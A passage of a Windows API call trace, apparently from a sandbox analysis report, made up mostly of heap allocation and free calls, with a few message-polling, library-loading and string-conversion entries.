Size=0x14) returned 0x90d440 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.246] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.247] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0190.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.248] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1b00 [0190.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1b00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.249] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.251] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.252] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.252] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.266] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.267] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.267] RtlAllocateHeap 